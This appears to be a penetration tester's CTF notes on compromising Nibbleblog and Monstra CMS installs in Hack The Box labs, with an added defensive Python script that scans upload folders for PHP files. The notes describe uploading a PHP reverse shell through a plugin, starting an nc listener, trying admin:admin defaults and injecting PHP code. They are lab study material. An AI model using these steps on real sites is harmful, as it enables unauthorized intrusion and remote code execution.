Blogs
Priority
Extends > Themes "Helloworld" > Save
System > Backup > Content > Files > Save something
System > Settings > Maintenance Mode <?php phpinfo(); ?> ..Save
Plugins are often exploitable
searchsploit
github 'issues'
REF
DirbNiktoWP - Also has webapp/cms/scanner
Nibbleblog
Obtain Admin credentials > Activate My image plugin by visiting
Upload PHP shell, ignore warnings. Visit
No matter what you NAME the PHP upload, it will ALWAYS be "image.php" after uploading
Setup reverse.php
Upload: "reverse.php" with my IP
Execute:
http://10.129.1.135/nibbleblog/content/private/plugins/my_image/image.php
nc -nvlp 4444
Connected!
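Defender-side check for the Nibbleblog upload above (added example, not part of the original notes): it walks a web content tree and flags files that carry a PHP-executable extension or PHP tags, such as the image.php that ends up under content/private/plugins/my_image/. The extension list, the function names and the sample files are assumptions constructed for the demo.

```python
import os
import tempfile

# Extensions a PHP handler mapping may execute (assumed list; match it to your server config).
EXEC_EXTS = {".php", ".phtml", ".phar", ".php5", ".pht"}
PHP_TAGS = (b"<?php", b"<?=")

def audit_upload_tree(root, sniff_bytes=4096):
    """Return sorted (relative_path, reason) findings for files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            try:
                with open(path, "rb") as fh:
                    head = fh.read(sniff_bytes).lower()
            except OSError:
                findings.append((rel, "unreadable"))
                continue
            if ext in EXEC_EXTS:
                findings.append((rel, "executable extension"))
            elif any(tag in head for tag in PHP_TAGS):
                findings.append((rel, "PHP tag in non-script file"))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample layout mirroring the plugin path from the notes."""
    plugin = os.path.join(root, "content", "private", "plugins", "my_image")
    os.makedirs(plugin)
    samples = {
        "image.php": b"<?php echo 'constructed sample'; ?>",
        "image.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
        "notes.txt": b"caption <?php /* constructed */ ?>",
    }
    for name, data in samples.items():
        with open(os.path.join(plugin, name), "wb") as fh:
            fh.write(data)

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return audit_upload_tree(tmp)

if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason}: {rel}")
```

Run it against the real content directory by calling audit_upload_tree() with that path; a legitimate image upload directory should produce no findings.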
Monstra
TartarHTB
Monstra
https://$IP/webservices/monstra-3.0.4/
https://$IP/webservices/monstra-3.0.4/admin/
admin:admin ..default works!
Try to edit themes!
They are often php
Monstra > Extends > Themes
"Helloworld" > Save ..fails
System > Backup ..not created (not writeable)
Content > Files ..new directory (created)
Content > Files > File ..Fails
System > Settings > Maintenance Mode
<?php phpinfo(); ?> ..Save Fails
Hello ..Save Fails
-----------------------
searchsploit monstra
github monstra > Issues >
php code execution
Look for sqli or lfi
Gym Management
REF: Redteam CTF Defcon Pivonka found this vuln on his own! Actually a public/known exploit